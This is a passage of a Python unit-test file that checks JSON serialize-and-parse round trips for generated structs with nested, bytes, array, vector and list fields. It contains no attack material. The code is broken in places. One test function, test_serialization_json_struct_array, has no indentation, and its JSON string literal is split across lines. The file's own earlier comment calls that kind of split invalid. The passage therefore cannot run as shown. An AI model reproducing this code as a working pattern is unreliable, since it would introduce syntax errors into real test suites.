        self.assertEqual(getattr(struct2, name), getattr(struct1, name), name)
    self.assertLess(abs(struct2.f137 - struct1.f137), 0.0001)
    self.assertLess(abs(struct2.f140 - struct1.f140), 1e+123)
def test_serialization_json_struct_nested(self):
    """Verify the JSON round trip of StructNested.

    Parses a reference JSON document (including enum, flags and nested
    struct fields), serializes it back to JSON, parses the output again,
    then checks the absolute field values and the field-by-field equality
    of the two struct instances.
    """
    # Define a source JSON string (single literal; the source file had it
    # broken across physical lines inside a string value, which is invalid)
    json = r'{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145901646321000,"f36":"00000000-0000-0000-0000-000000000000","f37":"9c8c268e-f0a6-11e8-a777-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]},"f100":null,"f101":true,"f102":null,"f103":null,"f104":255,"f105":null,"f106":null,"f107":33,"f108":null,"f109":null,"f110":1092,"f111":null,"f112":null,"f113":127,"f114":null,"f115":null,"f116":255,"f117":null,"f118":null,"f119":32767,"f120":null,"f121":null,"f122":65535,"f123":null,"f124":null,"f125":2147483647,"f126":null,"f127":null,"f128":4294967295,"f129":null,"f130":null,"f131":9223372036854775807,"f132":null,"f133":null,"f134":18446744073709551615,"f135":null,"f136":null,"f137":123.456,"f138":null,"f139":null,"f140":-1.23456e+125,"f141":null,"f142":null,"f143":"123456.123456","f144":null,"f145":null,"f146":"Initial string!","f147":null,"f148":null,"f149":1543145901647155000,"f150":null,"f151":null,"f152":"123e4567-e89b-12d3-a456-426655440000","f153":null,"f154":null,"f155":null,"f156":null,"f157":null,"f158":null,"f159":null,"f160":null,"f161":null,"f162":null,"f163":null,"f164":null,"f165":null,"f1000":0,"f1001":null,"f1002":50,"f1003":null,"f1004":0,"f1005":null,"f1006":42,"f1007":null,"f1008":{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145901647367000,"f36":"00000000-0000-0000-0000-000000000000","f37":"9c8c54c4-f0a6-11e8-a777-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"f1009":null,"f1010":{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145901648310000,"f36":"00000000-0000-0000-0000-000000000000","f37":"9c8c6b76-f0a6-11e8-a777-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]},"f100":null,"f101":true,"f102":null,"f103":null,"f104":255,"f105":null,"f106":null,"f107":33,"f108":null,"f109":null,"f110":1092,"f111":null,"f112":null,"f113":127,"f114":null,"f115":null,"f116":255,"f117":null,"f118":null,"f119":32767,"f120":null,"f121":null,"f122":65535,"f123":null,"f124":null,"f125":2147483647,"f126":null,"f127":null,"f128":4294967295,"f129":null,"f130":null,"f131":9223372036854775807,"f132":null,"f133":null,"f134":18446744073709551615,"f135":null,"f136":null,"f137":123.456,"f138":null,"f139":null,"f140":-1.23456e+125,"f141":null,"f142":null,"f143":"123456.123456","f144":null,"f145":null,"f146":"Initial string!","f147":null,"f148":null,"f149":1543145901648871000,"f150":null,"f151":null,"f152":"123e4567-e89b-12d3-a456-426655440000","f153":null,"f154":null,"f155":null,"f156":null,"f157":null,"f158":null,"f159":null,"f160":null,"f161":null,"f162":null,"f163":null,"f164":null,"f165":null},"f1011":null}'
    # Create a new struct from the source JSON string
    struct1 = test.StructNested.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructNested.from_json(json)
    # Required fields must survive the round trip with their source values
    self.assertEqual(struct2.f1, False)
    self.assertEqual(struct2.f2, True)
    self.assertEqual(struct2.f3, 0)
    self.assertEqual(struct2.f4, 0xFF)
    self.assertEqual(struct2.f5, '\0')
    self.assertEqual(struct2.f6, '!')
    self.assertEqual(struct2.f7, chr(0))
    self.assertEqual(struct2.f8, chr(0x0444))
    self.assertEqual(struct2.f9, 0)
    self.assertEqual(struct2.f10, 127)
    self.assertEqual(struct2.f11, 0)
    self.assertEqual(struct2.f12, 0xFF)
    self.assertEqual(struct2.f13, 0)
    self.assertEqual(struct2.f14, 32767)
    self.assertEqual(struct2.f15, 0)
    self.assertEqual(struct2.f16, 0xFFFF)
    self.assertEqual(struct2.f17, 0)
    self.assertEqual(struct2.f18, 2147483647)
    self.assertEqual(struct2.f19, 0)
    self.assertEqual(struct2.f20, 0xFFFFFFFF)
    self.assertEqual(struct2.f21, 0)
    self.assertEqual(struct2.f22, 9223372036854775807)
    self.assertEqual(struct2.f23, 0)
    self.assertEqual(struct2.f24, 0xFFFFFFFFFFFFFFFF)
    self.assertEqual(struct2.f25, 0.0)
    # Floating point fields are compared with a tolerance
    self.assertLess(abs(struct2.f26 - 123.456), 0.0001)
    self.assertEqual(struct2.f27, 0.0)
    self.assertLess(abs(struct2.f28 - -123.567e+123), 1e+123)
    self.assertEqual(struct2.f29, decimal.Decimal("0"))
    self.assertEqual(struct2.f30, decimal.Decimal("123456.123456"))
    self.assertEqual(struct2.f31, "")
    self.assertEqual(struct2.f32, "Initial string!")
    # Timestamps are stored as nanoseconds since the Unix epoch
    self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f33 / 1000000000), datetime.datetime(1970, 1, 1))
    self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f34 / 1000000000), datetime.datetime(1970, 1, 1))
    self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f35 / 1000000000), datetime.datetime(2018, 1, 1))
    self.assertEqual(struct2.f36, uuid.UUID(int=0))
    self.assertNotEqual(struct2.f37, uuid.UUID(int=0))
    self.assertEqual(struct2.f38, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
    # Optional fields that were null in the source must stay None
    for index in (100, 102, 103, 105, 106, 108, 109, 111, 112, 114, 115,
                  117, 118, 120, 121, 123, 124, 126, 127, 129, 130, 132,
                  133, 135, 136, 138, 139, 141, 142, 144, 145, 147, 148,
                  150, 151, 153, 154, 155, 156, 157, 158, 159, 160, 161,
                  162, 163, 164, 165):
        self.assertIsNone(getattr(struct2, "f%d" % index), "f%d" % index)
    # Optional fields that carried a value must keep it
    self.assertEqual(struct2.f101, True)
    self.assertEqual(struct2.f104, 0xFF)
    self.assertEqual(struct2.f107, '!')
    self.assertEqual(struct2.f110, chr(0x0444))
    self.assertEqual(struct2.f113, 127)
    self.assertEqual(struct2.f116, 0xFF)
    self.assertEqual(struct2.f119, 32767)
    self.assertEqual(struct2.f122, 0xFFFF)
    self.assertEqual(struct2.f125, 2147483647)
    self.assertEqual(struct2.f128, 0xFFFFFFFF)
    self.assertEqual(struct2.f131, 9223372036854775807)
    # BUG FIX: the original re-checked f131 here instead of verifying f134
    self.assertIsNotNone(struct2.f134)
    self.assertEqual(struct2.f134, 0xFFFFFFFFFFFFFFFF)
    self.assertIsNotNone(struct2.f137)
    self.assertLess(abs(struct2.f137 - 123.456), 0.0001)
    self.assertIsNotNone(struct2.f140)
    self.assertLess(abs(struct2.f140 - -123.567e+123), 1e+123)
    self.assertEqual(struct2.f143, decimal.Decimal("123456.123456"))
    self.assertEqual(struct2.f146, "Initial string!")
    self.assertIsNotNone(struct2.f149)
    self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f149 / 1000000000), datetime.datetime(2018, 1, 1))
    self.assertEqual(struct2.f152, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
    # Enum, flags and nested struct fields
    self.assertEqual(struct2.f1000, test.EnumSimple.ENUM_VALUE_0)
    self.assertEqual(struct2.f1001, None)
    self.assertEqual(struct2.f1002, test.EnumTyped.ENUM_VALUE_2)
    self.assertEqual(struct2.f1003, None)
    self.assertEqual(struct2.f1004, test.FlagsSimple.FLAG_VALUE_0)
    self.assertEqual(struct2.f1005, None)
    self.assertEqual(struct2.f1006, test.FlagsTyped.FLAG_VALUE_2 | test.FlagsTyped.FLAG_VALUE_4 | test.FlagsTyped.FLAG_VALUE_6)
    self.assertEqual(struct2.f1007, None)
    self.assertEqual(struct2.f1009, None)
    self.assertEqual(struct2.f1011, None)
    # Both struct instances must be field-by-field equal after the round trip
    # (f26/f28 and f137/f140 are floats and are compared with a tolerance)
    for index in list(range(1, 26)) + [27] + list(range(29, 41)):
        name = "f%d" % index
        self.assertEqual(getattr(struct2, name), getattr(struct1, name), name)
    self.assertLess(abs(struct2.f26 - struct1.f26), 0.0001)
    # BUG FIX: the original compared struct2.f28 with itself (always 0)
    self.assertLess(abs(struct2.f28 - struct1.f28), 1e+123)
    for index in list(range(100, 137)) + [138, 139] + list(range(141, 158)) + list(range(1000, 1008)):
        name = "f%d" % index
        self.assertEqual(getattr(struct2, name), getattr(struct1, name), name)
    self.assertLess(abs(struct2.f137 - struct1.f137), 0.0001)
    self.assertLess(abs(struct2.f140 - struct1.f140), 1e+123)
def test_serialization_json_struct_bytes(self):
    """Verify the JSON round trip of StructBytes (base64-encoded bytes fields)."""
    # Source JSON string: f1 = "ABC", f2 = "test", f3 = null
    json = r'{"f1":"QUJD","f2":"dGVzdA==","f3":null}'
    # Parse the source JSON string into a struct
    struct1 = test.StructBytes.from_json(json)
    # Serialize the struct back to a JSON string
    json = struct1.to_json()
    # The serialized document must not be empty
    self.assertGreater(len(json), 0)
    # Parse the serialized JSON string again
    struct2 = test.StructBytes.from_json(json)
    # f1 must decode to the three bytes of "ABC"
    self.assertEqual(len(struct2.f1), 3)
    for position, expected in enumerate("ABC"):
        self.assertEqual(chr(struct2.f1[position]), expected)
    # f2 is optional but was present: the four bytes of "test"
    self.assertIsNotNone(struct2.f2)
    self.assertEqual(len(struct2.f2), 4)
    for position, expected in enumerate("test"):
        self.assertEqual(chr(struct2.f2[position]), expected)
    # f3 was null in the source and must stay None
    self.assertIsNone(struct2.f3)
def test_serialization_json_struct_array(self):
# Define a source JSON string
json = r'{"f1":[48,65],"f2":[97,null],"f3":["MDAw","QUFB"],"f4":["YWFh",null],"f5":[1,2],"f6":[1,null],"f7":[3,7],"f8":[3,null],"f9":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145986060361000,"f36":"00000000-0000-0000-0000-000000000000","f37":"cedcad98-f0a6-11e8-9f47-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial 
string!","f33":0,"f34":0,"f35":1543145986060910000,"f36":"00000000-0000-0000-0000-000000000000","f37":"cedcc274-f0a6-11e8-9f47-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}],"f10":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145986061436000,"f36":"00000000-0000-0000-0000-000000000000","f37":"cedcd714-f0a6-11e8-9f47-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},null]}'
# Create a new struct from the source JSON string
struct1 = test.StructArray.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructArray.from_json(json)
self.assertEqual(len(struct2.f1), 2)
self.assertEqual(struct2.f1[0], 48)
self.assertEqual(struct2.f1[1], 65)
self.assertEqual(len(struct2.f2), 2)
self.assertEqual(struct2.f2[0], 97)
self.assertEqual(struct2.f2[1], None)
self.assertEqual(len(struct2.f3), 2)
self.assertEqual(len(struct2.f3[0]), 3)
self.assertEqual(struct2.f3[0][0], 48)
self.assertEqual(struct2.f3[0][1], 48)
self.assertEqual(struct2.f3[0][2], 48)
self.assertEqual(len(struct2.f3[1]), 3)
self.assertEqual(struct2.f3[1][0], 65)
self.assertEqual(struct2.f3[1][1], 65)
self.assertEqual(struct2.f3[1][2], 65)
self.assertEqual(len(struct2.f4), 2)
self.assertNotEqual(struct2.f4[0], None)
self.assertEqual(len(struct2.f4[0]), 3)
self.assertEqual(struct2.f4[0][0], 97)
self.assertEqual(struct2.f4[0][1], 97)
self.assertEqual(struct2.f4[0][2], 97)
self.assertEqual(struct2.f4[1], None)
self.assertEqual(len(struct2.f5), 2)
self.assertEqual(struct2.f5[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f5[1], test.EnumSimple.ENUM_VALUE_2)
self.assertEqual(len(struct2.f6), 2)
self.assertEqual(struct2.f6[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f6[1], None)
self.assertEqual(len(struct2.f7), 2)
self.assertEqual(struct2.f7[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f7[1], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
self.assertEqual(len(struct2.f8), 2)
self.assertEqual(struct2.f8[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f8[1], None)
self.assertEqual(len(struct2.f9), 2)
self.assertEqual(struct2.f9[0].f2, True)
self.assertEqual(struct2.f9[0].f12, 0xFF)
self.assertEqual(struct2.f9[0].f32, "Initial string!")
self.assertEqual(struct2.f9[1].f2, True)
self.assertEqual(struct2.f9[1].f12, 0xFF)
self.assertEqual(struct2.f9[1].f32, "Initial string!")
self.assertEqual(len(struct2.f10), 2)
self.assertNotEqual(struct2.f10[0], None)
self.assertEqual(struct2.f10[0].f2, True)
self.assertEqual(struct2.f10[0].f12, 0xFF)
self.assertEqual(struct2.f10[0].f32, "Initial string!")
self.assertEqual(struct2.f10[1], None)
def test_serialization_json_struct_vector(self):
    """Round-trip test.StructVector through JSON.

    Parses a reference JSON payload, re-serializes it, parses the result
    again, and verifies every vector field — bytes, optional bytes,
    enums, flags, nested structs and optional nested structs — survives
    the round trip, including explicit null elements.
    """
    # Define a source JSON string
    json = r'{"f1":[48,65],"f2":[97,null],"f3":["MDAw","QUFB"],"f4":["YWFh",null],"f5":[1,2],"f6":[1,null],"f7":[3,7],"f8":[3,null],"f9":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146157127964000,"f36":"00000000-0000-0000-0000-000000000000","f37":"34d38702-f0a7-11e8-b30e-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146157128572000,"f36":"00000000-0000-0000-0000-000000000000","f37":"34d39c88-f0a7-11e8-b30e-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}],"f10":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146157129063000,"f36":"00000000-0000-0000-0000-000000000000","f37":"34d3b038-f0a7-11e8-b30e-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},null]}'
    # Create a new struct from the source JSON string
    struct1 = test.StructVector.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructVector.from_json(json)
    # f1/f2: scalar vectors; the optional vector keeps its null element
    self.assertEqual(len(struct2.f1), 2)
    self.assertEqual(struct2.f1[0], 48)
    self.assertEqual(struct2.f1[1], 65)
    self.assertEqual(len(struct2.f2), 2)
    self.assertEqual(struct2.f2[0], 97)
    self.assertEqual(struct2.f2[1], None)
    # f3/f4: byte-sequence vectors (3 bytes each, base64-encoded in JSON)
    self.assertEqual(len(struct2.f3), 2)
    self.assertEqual(len(struct2.f3[0]), 3)
    self.assertEqual(struct2.f3[0][0], 48)
    self.assertEqual(struct2.f3[0][1], 48)
    self.assertEqual(struct2.f3[0][2], 48)
    self.assertEqual(len(struct2.f3[1]), 3)
    self.assertEqual(struct2.f3[1][0], 65)
    self.assertEqual(struct2.f3[1][1], 65)
    self.assertEqual(struct2.f3[1][2], 65)
    self.assertEqual(len(struct2.f4), 2)
    self.assertNotEqual(struct2.f4[0], None)
    self.assertEqual(len(struct2.f4[0]), 3)
    self.assertEqual(struct2.f4[0][0], 97)
    self.assertEqual(struct2.f4[0][1], 97)
    self.assertEqual(struct2.f4[0][2], 97)
    self.assertEqual(struct2.f4[1], None)
    # f5/f6: enum vectors, plain and optional
    self.assertEqual(len(struct2.f5), 2)
    self.assertEqual(struct2.f5[0], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f5[1], test.EnumSimple.ENUM_VALUE_2)
    self.assertEqual(len(struct2.f6), 2)
    self.assertEqual(struct2.f6[0], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f6[1], None)
    # f7/f8: flag (bitmask) vectors, plain and optional
    self.assertEqual(len(struct2.f7), 2)
    self.assertEqual(struct2.f7[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f7[1], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
    self.assertEqual(len(struct2.f8), 2)
    self.assertEqual(struct2.f8[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f8[1], None)
    # f9/f10: nested-struct vectors; spot-check representative fields
    self.assertEqual(len(struct2.f9), 2)
    self.assertEqual(struct2.f9[0].f2, True)
    self.assertEqual(struct2.f9[0].f12, 0xFF)
    self.assertEqual(struct2.f9[0].f32, "Initial string!")
    self.assertEqual(struct2.f9[1].f2, True)
    self.assertEqual(struct2.f9[1].f12, 0xFF)
    self.assertEqual(struct2.f9[1].f32, "Initial string!")
    self.assertEqual(len(struct2.f10), 2)
    self.assertNotEqual(struct2.f10[0], None)
    self.assertEqual(struct2.f10[0].f2, True)
    self.assertEqual(struct2.f10[0].f12, 0xFF)
    self.assertEqual(struct2.f10[0].f32, "Initial string!")
    self.assertEqual(struct2.f10[1], None)
def test_serialization_json_struct_list(self):
    """Round-trip test.StructList through JSON.

    Same field-by-field checks as the vector test, but against the
    list-based container struct: plain/optional scalars, byte
    sequences, enums, flags and nested structs, with null elements
    preserved across serialize/deserialize.
    """
    # Define a source JSON string
    json = r'{"f1":[48,65],"f2":[97,null],"f3":["MDAw","QUFB"],"f4":["YWFh",null],"f5":[1,2],"f6":[1,null],"f7":[3,7],"f8":[3,null],"f9":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146220253760000,"f36":"00000000-0000-0000-0000-000000000000","f37":"5a73e7fe-f0a7-11e8-89e6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146220255725000,"f36":"00000000-0000-0000-0000-000000000000","f37":"5a741990-f0a7-11e8-89e6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}],"f10":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146220256802000,"f36":"00000000-0000-0000-0000-000000000000","f37":"5a74e4b0-f0a7-11e8-89e6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},null]}'
    # Create a new struct from the source JSON string
    struct1 = test.StructList.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructList.from_json(json)
    # f1/f2: scalar lists; the optional list keeps its null element
    self.assertEqual(len(struct2.f1), 2)
    self.assertEqual(struct2.f1[0], 48)
    self.assertEqual(struct2.f1[1], 65)
    self.assertEqual(len(struct2.f2), 2)
    self.assertEqual(struct2.f2[0], 97)
    self.assertEqual(struct2.f2[1], None)
    # f3/f4: byte-sequence lists (3 bytes each, base64-encoded in JSON)
    self.assertEqual(len(struct2.f3), 2)
    self.assertEqual(len(struct2.f3[0]), 3)
    self.assertEqual(struct2.f3[0][0], 48)
    self.assertEqual(struct2.f3[0][1], 48)
    self.assertEqual(struct2.f3[0][2], 48)
    self.assertEqual(len(struct2.f3[1]), 3)
    self.assertEqual(struct2.f3[1][0], 65)
    self.assertEqual(struct2.f3[1][1], 65)
    self.assertEqual(struct2.f3[1][2], 65)
    self.assertEqual(len(struct2.f4), 2)
    self.assertNotEqual(struct2.f4[0], None)
    self.assertEqual(len(struct2.f4[0]), 3)
    self.assertEqual(struct2.f4[0][0], 97)
    self.assertEqual(struct2.f4[0][1], 97)
    self.assertEqual(struct2.f4[0][2], 97)
    self.assertEqual(struct2.f4[1], None)
    # f5/f6: enum lists, plain and optional
    self.assertEqual(len(struct2.f5), 2)
    self.assertEqual(struct2.f5[0], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f5[1], test.EnumSimple.ENUM_VALUE_2)
    self.assertEqual(len(struct2.f6), 2)
    self.assertEqual(struct2.f6[0], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f6[1], None)
    # f7/f8: flag (bitmask) lists, plain and optional
    self.assertEqual(len(struct2.f7), 2)
    self.assertEqual(struct2.f7[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f7[1], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
    self.assertEqual(len(struct2.f8), 2)
    self.assertEqual(struct2.f8[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
